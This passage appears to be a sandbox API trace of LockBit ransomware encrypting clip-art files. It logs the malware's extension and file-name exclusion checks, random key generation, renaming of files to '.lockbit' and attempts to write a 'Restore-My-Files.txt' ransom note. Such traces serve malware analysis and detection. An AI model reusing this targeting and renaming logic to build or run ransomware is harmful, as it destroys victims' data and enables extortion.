lpString2=".WMF") returned -1 [0118.477] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0118.477] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0118.477] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0118.477] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0118.477] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0118.477] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0118.477] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0118.477] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0118.477] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0118.477] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0118.477] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0118.477] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0118.477] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0118.477] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.477] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0118.477] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0118.477] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0118.477] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0118.477] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH02282_.WMF") returned 1 [0118.477] lstrcmpiW (lpString1="ntldr", lpString2="HH02282_.WMF") returned 1 [0118.477] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH02282_.WMF") returned 1 [0118.477] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH02282_.WMF") returned -1 [0118.477] lstrcmpiW (lpString1="autorun.inf", lpString2="HH02282_.WMF") returned -1 [0118.477] lstrcmpiW (lpString1="thumbs.db", lpString2="HH02282_.WMF") returned 1 [0118.477] lstrcmpiW (lpString1="iconcache.db", lpString2="HH02282_.WMF") returned 1 [0118.478] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0118.478] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF") returned=".WMF" [0118.478] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0118.478] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0118.478] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0118.478] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0118.478] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0118.478] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0118.478] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0118.478] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0118.478] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0118.478] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0118.478] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0118.478] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0118.478] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0118.478] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0118.478] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0118.478] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0118.478] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0118.478] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0118.478] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0118.478] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0118.478] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0118.478] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0118.478] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0118.478] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0118.478] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0118.478] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0118.479] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0118.479] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0118.479] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF.lockbit") returned 72 [0118.479] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02282_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x13c0 [0118.479] CreateIoCompletionPort (FileHandle=0x13c0, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0118.479] malloc (_Size=0x40068) returned 0x1ff1e60 [0118.481] GetFileSizeEx (in: hFile=0x13c0, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=7932) returned 1 [0118.481] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.481] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.481] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0118.481] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.482] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.482] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0118.482] ReadFile (in: hFile=0x13c0, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0118.541] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.541] malloc (_Size=0xa6) returned 0x77d7a8 [0118.541] NtSetInformationFile (FileHandle=0x13c0, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0118.587] free (_Block=0x77d7a8) [0118.587] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02282_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0118.587] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0118.587] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0118.587] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5fa59600, ftCreationTime.dwHighDateTime=0x1bd4bf5, ftLastAccessTime.dwLowDateTime=0x61ca6dd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x5fa59600, ftLastWriteTime.dwHighDateTime=0x1bd4bf5, nFileSizeHigh=0x0, nFileSizeLow=0x15b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH02298_.WMF", cAlternateFileName="")) returned 1 [0118.587] lstrcmpiW (lpString1=".", lpString2="HH02298_.WMF") returned -1 [0118.587] lstrcmpiW (lpString1="..", lpString2="HH02298_.WMF") returned -1 [0118.587] PathFindExtensionW (pszPath="HH02298_.WMF") returned=".WMF" [0118.587] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0118.587] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0118.587] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0118.587] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0118.587] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0118.587] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0118.588] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0118.588] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0118.588] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0118.588] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0118.588] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0118.588] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0118.588] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0118.588] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0118.588] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0118.588] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0118.588] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0118.588] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0118.588] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0118.588] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0118.588] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0118.588] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0118.588] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0118.588] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0118.588] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.588] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0118.588] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0118.588] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0118.588] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0118.588] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0118.589] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0118.589] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0118.589] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0118.589] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0118.589] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0118.589] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0118.589] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0118.589] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0118.589] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0118.589] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0118.589] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0118.589] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0118.589] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.589] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0118.589] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0118.589] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0118.589] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0118.589] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH02298_.WMF") returned 1 [0118.589] lstrcmpiW (lpString1="ntldr", lpString2="HH02298_.WMF") returned 1 [0118.589] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH02298_.WMF") returned 1 [0118.589] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH02298_.WMF") returned -1 [0118.589] lstrcmpiW (lpString1="autorun.inf", lpString2="HH02298_.WMF") returned -1 [0118.589] lstrcmpiW (lpString1="thumbs.db", lpString2="HH02298_.WMF") returned 1 [0118.589] lstrcmpiW (lpString1="iconcache.db", lpString2="HH02298_.WMF") returned 1 [0118.590] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0118.590] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF") returned=".WMF" [0118.590] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0118.590] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0118.590] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0118.590] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0118.590] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0118.590] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0118.590] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0118.590] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0118.590] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0118.590] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0118.590] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0118.590] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0118.590] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0118.590] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0118.590] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0118.590] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0118.590] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0118.590] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0118.590] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0118.590] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0118.591] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0118.591] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0118.591] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0118.591] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0118.591] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0118.591] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0118.591] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0118.591] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0118.591] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF.lockbit") returned 72 [0118.591] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02298_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0118.593] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0118.593] malloc (_Size=0x40068) returned 0x3df0008 [0118.593] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=5552) returned 1 [0118.593] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.594] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.594] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0118.594] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.594] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.594] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0118.594] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0118.596] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0118.596] malloc (_Size=0xa6) returned 0x77d7a8 [0118.596] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0118.597] free (_Block=0x77d7a8) [0118.597] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02298_.WMF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0118.597] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0118.597] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0118.597] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd3cd4300, ftCreationTime.dwHighDateTime=0x1bd4bcf, ftLastAccessTime.dwLowDateTime=0x538bb350, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xd3cd4300, ftLastWriteTime.dwHighDateTime=0x1bd4bcf, nFileSizeHigh=0x0, nFileSizeLow=0x136a, dwReserved0=0x0, dwReserved1=0x0, cFileName="HH02312_.WMF", cAlternateFileName="")) returned 1 [0118.597] lstrcmpiW (lpString1=".", lpString2="HH02312_.WMF") returned -1 [0118.597] lstrcmpiW (lpString1="..", lpString2="HH02312_.WMF") returned -1 [0118.598] PathFindExtensionW (pszPath="HH02312_.WMF") returned=".WMF" [0118.598] lstrcmpiW (lpString1=".386", lpString2=".WMF") returned -1 [0118.598] lstrcmpiW (lpString1=".cmd", lpString2=".WMF") returned -1 [0118.598] lstrcmpiW (lpString1=".exe", lpString2=".WMF") returned -1 [0118.598] lstrcmpiW (lpString1=".ani", lpString2=".WMF") returned -1 [0118.598] lstrcmpiW (lpString1=".adv", lpString2=".WMF") returned -1 [0118.598] lstrcmpiW (lpString1=".theme", lpString2=".WMF") returned -1 [0118.598] lstrcmpiW (lpString1=".msi", lpString2=".WMF") returned -1 [0118.598] lstrcmpiW (lpString1=".msp", lpString2=".WMF") returned -1 [0118.598] lstrcmpiW (lpString1=".com", lpString2=".WMF") returned -1 [0118.598] lstrcmpiW (lpString1=".diagpkg", lpString2=".WMF") returned -1 [0118.598] lstrcmpiW (lpString1=".nls", lpString2=".WMF") returned -1 [0118.598] lstrcmpiW (lpString1=".diagcab", lpString2=".WMF") returned -1 [0118.598] lstrcmpiW (lpString1=".lock", lpString2=".WMF") returned -1 [0118.598] lstrcmpiW (lpString1=".ocx", lpString2=".WMF") returned -1 [0118.598] lstrcmpiW (lpString1=".mpa", lpString2=".WMF") returned -1 [0118.598] lstrcmpiW (lpString1=".cpl", lpString2=".WMF") returned -1 [0118.598] lstrcmpiW (lpString1=".mod", lpString2=".WMF") returned -1 [0118.598] lstrcmpiW (lpString1=".hta", lpString2=".WMF") returned -1 [0118.598] lstrcmpiW (lpString1=".icns", lpString2=".WMF") returned -1 [0118.598] lstrcmpiW (lpString1=".prf", lpString2=".WMF") returned -1 [0118.598] lstrcmpiW (lpString1=".rtp", lpString2=".WMF") returned -1 [0118.598] lstrcmpiW (lpString1=".diagcfg", lpString2=".WMF") returned -1 [0118.598] lstrcmpiW (lpString1=".msstyles", lpString2=".WMF") returned -1 [0118.598] lstrcmpiW (lpString1=".bin", lpString2=".WMF") returned -1 [0118.598] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.598] lstrcmpiW (lpString1=".shs", lpString2=".WMF") returned -1 [0118.599] lstrcmpiW (lpString1=".drv", lpString2=".WMF") returned -1 [0118.599] lstrcmpiW (lpString1=".wpx", lpString2=".WMF") returned 1 [0118.599] lstrcmpiW (lpString1=".bat", lpString2=".WMF") returned -1 [0118.599] lstrcmpiW (lpString1=".rom", lpString2=".WMF") returned -1 [0118.599] lstrcmpiW (lpString1=".msc", lpString2=".WMF") returned -1 [0118.599] lstrcmpiW (lpString1=".spl", lpString2=".WMF") returned -1 [0118.599] lstrcmpiW (lpString1=".ps1", lpString2=".WMF") returned -1 [0118.599] lstrcmpiW (lpString1=".msu", lpString2=".WMF") returned -1 [0118.599] lstrcmpiW (lpString1=".ics", lpString2=".WMF") returned -1 [0118.599] lstrcmpiW (lpString1=".key", lpString2=".WMF") returned -1 [0118.599] lstrcmpiW (lpString1=".mp3", lpString2=".WMF") returned -1 [0118.599] lstrcmpiW (lpString1=".reg", lpString2=".WMF") returned -1 [0118.599] lstrcmpiW (lpString1=".dll", lpString2=".WMF") returned -1 [0118.599] lstrcmpiW (lpString1=".ini", lpString2=".WMF") returned -1 [0118.599] lstrcmpiW (lpString1=".idx", lpString2=".WMF") returned -1 [0118.599] lstrcmpiW (lpString1=".sys", lpString2=".WMF") returned -1 [0118.599] lstrcmpiW (lpString1=".hlp", lpString2=".WMF") returned -1 [0118.599] lstrcmpiW (lpString1=".ico", lpString2=".WMF") returned -1 [0118.599] lstrcmpiW (lpString1=".lnk", lpString2=".WMF") returned -1 [0118.599] lstrcmpiW (lpString1=".rdp", lpString2=".WMF") returned -1 [0118.599] lstrcmpiW (lpString1=".lockbit", lpString2=".WMF") returned -1 [0118.599] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="HH02312_.WMF") returned 1 [0118.599] lstrcmpiW (lpString1="ntldr", lpString2="HH02312_.WMF") returned 1 [0118.599] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="HH02312_.WMF") returned 1 [0118.599] lstrcmpiW (lpString1="bootsect.bak", lpString2="HH02312_.WMF") returned -1 [0118.599] lstrcmpiW (lpString1="autorun.inf", lpString2="HH02312_.WMF") returned -1 [0118.600] lstrcmpiW (lpString1="thumbs.db", lpString2="HH02312_.WMF") returned 1 [0118.600] lstrcmpiW (lpString1="iconcache.db", lpString2="HH02312_.WMF") returned 1 [0118.600] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0118.600] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF") returned=".WMF" [0118.600] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0118.600] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0118.600] lstrcmpiW (lpString1=".7z", lpString2=".WMF") returned -1 [0118.600] lstrcmpiW (lpString1=".ckp", lpString2=".WMF") returned -1 [0118.600] lstrcmpiW (lpString1=".dacpac", lpString2=".WMF") returned -1 [0118.600] lstrcmpiW (lpString1=".db", lpString2=".WMF") returned -1 [0118.600] lstrcmpiW (lpString1=".db-shm", lpString2=".WMF") returned -1 [0118.600] lstrcmpiW (lpString1=".db-wal", lpString2=".WMF") returned -1 [0118.600] lstrcmpiW (lpString1=".db3", lpString2=".WMF") returned -1 [0118.600] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0118.600] lstrcmpiW (lpString1=".dbc", lpString2=".WMF") returned -1 [0118.600] lstrcmpiW (lpString1=".dbs", lpString2=".WMF") returned -1 [0118.600] lstrcmpiW (lpString1=".dbt", lpString2=".WMF") returned -1 [0118.600] lstrcmpiW (lpString1=".dbv", lpString2=".WMF") returned -1 [0118.600] lstrcmpiW (lpString1=".frm", lpString2=".WMF") returned -1 [0118.600] lstrcmpiW (lpString1=".mdf", lpString2=".WMF") returned -1 [0118.600] lstrcmpiW (lpString1=".mrg", lpString2=".WMF") returned -1 [0118.600] lstrcmpiW (lpString1=".mwb", lpString2=".WMF") returned -1 [0118.600] lstrcmpiW (lpString1=".myd", lpString2=".WMF") returned -1 [0118.600] lstrcmpiW (lpString1=".ndf", lpString2=".WMF") returned -1 [0118.600] lstrcmpiW (lpString1=".qry", lpString2=".WMF") returned -1 [0118.600] lstrcmpiW (lpString1=".sdb", lpString2=".WMF") returned -1 [0118.600] lstrcmpiW (lpString1=".sdf", lpString2=".WMF") returned -1 [0118.601] lstrcmpiW (lpString1=".sql", lpString2=".WMF") returned -1 [0118.601] lstrcmpiW (lpString1=".sqlite", lpString2=".WMF") returned -1 [0118.601] lstrcmpiW (lpString1=".sqlite3", lpString2=".WMF") returned -1 [0118.601] lstrcmpiW (lpString1=".sqlitedb", lpString2=".WMF") returned -1 [0118.601] lstrcmpiW (lpString1=".tmd", lpString2=".WMF") returned -1 [0118.601] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF.lockbit") returned 72 [0118.601] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\hh02312_.wmf"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0118.606] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0118.606] malloc (_Size=0x40068) returned 0x3e70008 [0118.607] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x3e70020 | out: lpFileSize=0x3e70020*=4970) returned 1 [0118.607] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.607] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.607] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb003c) returned 0x0 [0118.607] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0118.608] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0118.608] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3eb004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3eb004c) returned 0x0 [0118.608] ReadFile (in: hFile=0x3bc, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0118.613] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\HH02312_.WMF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft 